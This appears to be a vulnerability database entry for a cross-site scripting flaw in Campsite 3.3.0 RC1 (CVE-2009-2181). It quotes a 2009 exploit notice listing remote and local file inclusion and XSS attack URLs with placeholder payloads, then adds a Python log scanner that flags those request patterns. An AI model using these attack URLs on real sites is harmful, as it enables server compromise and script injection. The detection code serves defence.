Campsite list_dir.php Cross-Site Scripting Vulnerability

Vulnerability ID: 1117995    Vulnerability type: Cross-site scripting
Published: 2009-06-22    Updated: 2009-06-24
CVE ID: CVE-2009-2181    CNNVD-ID: CNNVD-200906-380
Platform: PHP    CVSS score: 4.3
|Vulnerability Source
https://www.exploit-db.com/exploits/8995
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-380
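|Vulnerability Details
A cross-site scripting vulnerability exists in admin-files/templates/list_dir.php in Campsite 3.3.0 RC1. Remote attackers can inject arbitrary web script or HTML via the listbasedir parameter.
|Exploit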
                                C r a C k E r
             T H E   C R A C K   O F   E T E R N A L   M I G H T

         From The Ashes and Dust Rises An Unimaginable crack....

         [ Remote File Include ]     [ Local File Include ]     [ XSS ]

Author   : CraCkEr
Script   : Campsite 3.3.0 RC1
Download : sourceforge.net
Method   : GET
Critical : High
Impact   : system information
Register Globals : [x] ON   [ ] OFF

DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.

Exploit URLs

[RFI]

http://localhost/path/implementation/site/admin-files/ad_popup.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/camp_html.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/init_content.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/logout.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/menu.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/set-author.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/include/phorum_load.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/article_import/CommandProcessor.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/article_import/index.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/add.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/add_move.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/autopublish.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/autopublish_del.php?GLOBALS[g_campsiteDir]=[SHELL]

[LFI]

http://localhost/path/implementation/site/admin-files/ad.php?GLOBALS[g_campsiteDir]=[LFI]


[XSS]

http://localhost/path/implementation/site/admin-files/templates/list_dir.php?listbasedir=[XSS]

   

Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

© CraCkEr 2009

# milw0rm.com [2009-06-22]
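
An added detection example, not part of the original advisory or of the Campsite code base: it scans web-server access logs for the two request shapes listed above, a `GLOBALS[...]` request parameter and HTML metacharacters in `listbasedir` on `list_dir.php`. The log lines, finding labels and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not real traffic); paths follow the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2009:10:00:01 +0000] "GET /site/admin-files/menu.php?GLOBALS[g_campsiteDir]=PLACEHOLDER HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/Jun/2009:10:00:02 +0000] "GET /site/admin-files/ad.php?GLOBALS%5Bg_campsiteDir%5D=PLACEHOLDER HTTP/1.1" 200 512',
    '192.0.2.12 - - [22/Jun/2009:10:00:03 +0000] "GET /site/admin-files/templates/list_dir.php?listbasedir=%253Cb%253Etest HTTP/1.1" 200 734',
    '192.0.2.13 - - [22/Jun/2009:10:00:04 +0000] "GET /site/admin-files/templates/list_dir.php?listbasedir=/look/img HTTP/1.1" 200 734',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HTML_META_RE = re.compile(r'[<>"\']')
XSS_PATH = "/admin-files/templates/list_dir.php"

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded input is inspected in clear form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return set()
    target = urlsplit(match.group(1))
    findings = set()
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        key, value = decode_fully(key), decode_fully(value)
        # A request parameter named GLOBALS[...] tries to overwrite PHP globals.
        if key == "GLOBALS" or key.startswith("GLOBALS["):
            findings.add("globals-overwrite")
        # HTML metacharacters in listbasedir on the page named in CVE-2009-2181.
        if key == "listbasedir" and target.path.endswith(XSS_PATH) and HTML_META_RE.search(value):
            findings.add("listbasedir-markup")
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for every line with a finding."""
    results = ((n, sorted(classify(l))) for n, l in enumerate(lines, start=1))
    return [(n, found) for n, found in results if found]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```
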
|References

Source: MILW0RM
Name: 8995
Link: http://www.milw0rm.com/exploits/8995
Source: OSVDB
Name: 55313
Link: http://osvdb.org/55313